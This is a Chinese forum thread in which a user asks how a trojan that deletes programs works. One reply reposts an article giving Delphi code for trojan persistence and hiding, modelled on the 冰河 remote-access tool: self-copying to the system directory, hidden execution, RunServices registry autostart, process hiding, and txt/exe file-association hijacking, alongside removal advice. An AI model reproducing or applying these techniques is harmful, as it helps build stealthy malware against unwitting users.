系统中木马问题(200分)

  • 主题发起人 主题发起人 chenliang_fly
  • 开始时间 开始时间
C

chenliang_fly

Unregistered / Unconfirmed
GUEST, unregistred user!
前几天我运行机器上的一个程序,发现程序文件被莫名其妙的删除了,开始以为是自己一不
小心误删除,就重装了一遍该程序,谁知昨天运行另一个程序,同样的问题发生了。意识到
不妙,装了优化大师,发现两个可疑端口被打开,TCP 25, TCP 6789(Doly Trojan),用金山
毒霸2002查杀病毒,却没发现任何病毒,注册表中也没发现自启动的可疑程序,任务管理器
中也没发现。不知原因何在,请问哪为大虾有相关资料和解决方法。系统window2000 p
 
检查注册表的RUN,系统的服务。杀杀杀!
 
超级兔子4。2
 
木马克星,要不就把那个端口关了
 
同意上面观点。用木马克星。我用过。挺好用的。
 
to 上面的all:
其实,我主要的目的是想了解该木马的运行机理,而不是清除方法,这些方法我自己也知道
:)
 
这是一种关联式木马,比如说,我们一点击1.txt,系统就自动运行NotePad,有的木马会以这种
文件关联的方式存在于系统中。仔细检查一下你系统中对系统文件类型的定义,有没有异常。
如果经常程序丢失,可能是对.EXE文件做了关联,即当你点击.EXE文件时,会先运行一个木马
的样本,完成操作后,他才会执行你本身的文件(都删除了,自然是不会运行的)。
 
你用的是IE6吗?
IE6不安全,会出现这样的问题
 
程序在哪儿?下一个玩玩……
 
ie5;
并且注意,我主要是想了解关于doly木马的原理、特点、攻击方式,netameng,的说法有些
价值,我会加分的:)其他高手加油!
 
找到了,看看:
http://xexploit.css.com.cn/aqgl/content/aqshijian/26.htm
 
借jingtao美文,灌一下。
 
“冰河”启示录
陈经韬
http://Lovejingtao.126.com ;
Lovejingtao@21cn.com
前言:我经常在杂志和报刊上看到此类标题的文章,但大多是骗稿费的,没有任何技术含量.于是一气之下写了这编东西.本人声明如下:(一)本人对"冰河"及其作者没有任何不满,相反,作者肯帮助初学者的态度是我们每一个人都应该学习的.(二)本文的目的在于交流编程经验,没有任何其它不良企图.(三)在一些领域,我们理应宁可自制力让我们的预见力保持寂寞,也不要去做一个打开潘多拉盒子的先知。所以一些更厉害的方法我们现在不会提,以后也不会.--2000.8.3
(1)
“冰河”是有名的用C++Builder编写的国产远程管理软件,其自我的功能保护很强,下面就以Delphi为例谈一谈它的原理,希望对大家有一些启发.
一、程序安装
此类程序一般会把自己隐藏起来运行,通常不外乎以下几种方法:自我拷贝法、资源文件法、网页方式安装、类病毒捆绑法(如YAI).自我拷贝法适用于本身就一个文件,资源文件法可以同时安装好几个文件,网页方式安装要先向M$交钱换安全签证,类病毒捆绑法利用了病毒的原理.本文只介绍自我拷贝法,其它方法请到我的个人主页去看http://lovejingtao.126.com
1:自我拷贝法
这种方法的原理是程序运行时先查看自己是不是在特定目录下,如果是就继续运行,如果不是就把自己拷贝到特定目录下,然后运行新程序,再退出旧程序.
打开Delphi,新建一个工程,在窗口的Create事件中写代码:
procedure TForm1.FormCreate(Sender: TObject);
var myname: string;
begin
myname := ExtractFilename(Application.Exename);
//获得文件名
if application.Exename <> GetWindir + myname then
//如果文件不是在Windows/System/那么..
begin
copyfile(pchar(application.Exename), pchar(GetWindir + myname), False);{将自己拷贝到Windows/System/下}
Winexec(pchar(GetWindir + myname), sw_hide);//运行Windows/System/下的新文件
application.Terminate;//退出
end;
end;
其中GetWinDir是自定义函数,起功能是找出Windows/System/的路径.
function GetWinDir: String;
var
Buf: array[0..MAX_PATH] of char;
begin
GetSystemDirectory(Buf, MAX_PATH);
Result := Buf;
if Result[Length(Result)]<>'/' then
Result := Result + '/';
end;
另外,为了避免同时运行多个程序的副本(节约系统资源也),程序一般会弄成每次只能运行一个.这又有几种方法.
一种方法是程序运行时先查找有没有相同的运行了,如果有,就立刻退出程序.
修改dpr项目文件,修改begin
和end之间的代码如下:
begin
Application.Initialize;
if FindWindow('TForm1','Form1')=0 then
begin

//当没有找到Form1时执行下面代码
Application.ShowMainForm:=False;
//不显示主窗口
Application.CreateForm(TForm1, Form1);
Application.Run;
end;
end.
另一种方法是启动时会先通过窗口名来确定是否已经在运行,如果是则关闭原先的再启动。“冰河”就是用这种方法的。
这样做的好处在于方便升级.它会自动用新版本覆盖旧版本.
方法如下:修改dpr项目文件
uses
Forms,windows,messages,
Unit1 in 'Unit1.pas' {Form1};

为了程序能在Windows每次启动时自动运行,可以通过六种途径来实现.“冰河”用注册表的方式。
加入Registry单元,改写上面的窗口Create事件,改写后的程序如下:
procedure TForm1.FormCreate(Sender: TObject);
const K = '/Software/Microsoft/Windows/CurrentVersion/RunServices';
var myname: string;
begin
{Write by Lovejingtaohttp://Lovejingtao.126.com,Lovejingtao@21cn.com}
myname := ExtractFilename(Application.Exename);
//获得文件名
if application.Exename <> GetWindir + myname then
//如果文件不是在Windows/System/那么..
begin
copyfile(pchar(application.Exename), pchar(GetWindir + myname), False);{//将自己拷贝到Windows/System/下}
Winexec(pchar(GetWindir + myname), sw_hide);//运行Windows/System/下的新文件
application.Terminate;//退出
end;
with TRegistry.Create do
try
RootKey := HKEY_LOCAL_MACHINE;
OpenKey( K, TRUE );
WriteString( 'syspler', application.ExeName );
finally
free;
end;
end;
为了让程序用ALT+DEL+CTRL看不见,在implementation后添加声明:
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
stdcall;
external 'KERNEL32.DLL';
再在上面的窗口Create事件加上一句:RegisterServiceProcess(GetCurrentProcessID, 1);//隐藏
注意:如果系统为NT,应该改用把自己挂到别的进程里面实现真正的隐藏.这样一来用进程查看器也无法发现其进程.具体可以参考BO2K的代码.如果你还是要用上面的方法,那么可以这样:
function My_SelfHide: Boolean;
type
TRegisterServiceProcess = function(dwProcessID, dwType: DWord): DWORD;
stdcall;
var
hNdl: THandle;
RegisterServiceProcess: TRegisterServiceProcess;
begin
Result := False;
if Win32Platform <> VER_PLATFORM_WIN32_NT then
//不是NT
begin
hNdl := LoadLibrary('KERNEL32.DLL');
RegisterServiceProcess := GetProcAddress(hNdl, 'RegisterServiceProcess');
RegisterServiceProcess(GetCurrentProcessID, 1);
FreeLibrary(hNdl);
Result := True;
end
else
Exit;
end;

启示1:当我们中了“冰河”,如果被对方上了密码而无法自己卸载时,可以先找出是什么文件,然后自己配置一个没有密码的来运行,这样它就会把原来有密码的覆盖掉,自己就可以轻松用它的卸载功能把它卸掉.如果你会编程,也可以自己写一个"清除器"了,方法是先查找到窗口名,向它发送退出命令,再把它删除即可.

(2)
“冰河”的自我功能保护很强,它一般通过Txt或Exe文件关联来达到自我恢复.所以有很多人明明把它杀掉了,但重新启动时又会出现.下面举以Txt文件关联为例.
打开Delphi,新建一个工程,在窗口的Create事件中写代码:
uses Registry
procedure TForm1.FormCreate(Sender: TObject);
const Kkk = '/Software/Microsoft/Windows/CurrentVersion/RunServices';
const K = '/txtfile/shell/open/command';
var sFileName:string;
begin

//******************************************************
with TRegistry.Create do
//写注册表,让程序跟文本文件关联
try
RootKey := HKEY_CLASSES_ROOT;
OpenKey( K, TRUE );
{Write by Lovejingtaohttp://lovejingtao.126.com}
WriteString( '', application.ExeName+' "%1" ');
{Write by Lovejingtao,lovejingtao@21cn.com}
finally
free;
end;
//*******************************************************
with TRegistry.Create do
//写注册表,每次启动时自动运行
try
RootKey := HKEY_LOCAL_MACHINE;
OpenKey( Kkk, TRUE );
WriteString( 'myTray', application.ExeName );
finally
free;
end;
//********************************************************
if FileExists(pchar(Getwindir+'Sysplay.exe'))=false then
//如果文件已经删除
begin
copyfile;//自定义拷贝资源文件过程
winexec(pchar(Getwindir+'Sysplay.exe'),sw_hide);
end;

//**********************************************************
if ParamCount>0 then
begin
(* 有执行参数传入 *)
sFileName:=ParamStr(1);
(* 取得参数内容 *)
winexec(pchar('Notepad.exe '+sFileName),sw_show);(*用记事本打开*)
//winexec(pchar( sFileName),sw_show);
end;
//*******************************************************
application.Terminate;//退出
end;
如果要改为与Exe文件关联,只要把"const K = '/txtfile/shell/open/command';"改为
"const K = '/exefile/shell/open/command';",把"winexec(pchar('Notepad.exe '+sFileName),sw_show);"
改为"winexec(pchar( sFileName),sw_show);"即可.当然,还要加入是否退出Windows而运行的Rundll32.dll,
否则会因为关联Exe文件而退不出Windows.
启示2:手工删除“冰河”时,还要改掉它的保护功能,不能让它恢复.如果是关联了文本文件,先改注册表让它不能自动运行,重启后不要打开文本文件,立刻进到其安装目录把它删除.如果是关联了Exe文件,那只有回到Dos下删.切记:一定要把两个文件同时删掉,否则你重启后会发现文件又恢复了.

★作者:

陈经韬
Http:Lovejingtao.126.com
E-Mail: Lovejingtao@21.cn.com

----------------------------------------------
 
go on :)
主要是原理和机制
 
如果没什么说的话,星期一结贴:(
 
算了,等不来了
 
后退
顶部